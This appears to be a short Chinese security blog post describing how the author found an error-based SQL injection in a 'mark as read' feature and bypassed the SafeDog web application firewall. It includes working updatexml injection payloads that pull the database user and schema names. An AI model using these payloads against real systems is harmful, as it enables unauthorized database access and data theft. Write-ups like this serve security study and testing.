学以致用。
漏洞发现
常规流程走一遍,发现一处标记信息已读的功能点比较可疑:
抓包加单引号重放:
可以看到单引号被转义了,看下闭合方式,问题不大,因为有回显,直接使用报错注入。
报错注入
获取下数据库用户
127) or updatexml(1,concat(0x3a,user()),1
获取数据库
127) or updatexml(1,(select concat(0x7e, (schema_name),0x7e) FROM information_schema.schemata limit 0,1),1
Bypass安全狗
掏出前段时间学到的打狗棒法(超长字符Bypass,这里类型不同,原理相同):传送门
后面的和常规报错没什么不同,就不啰嗦了,领会精神~
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容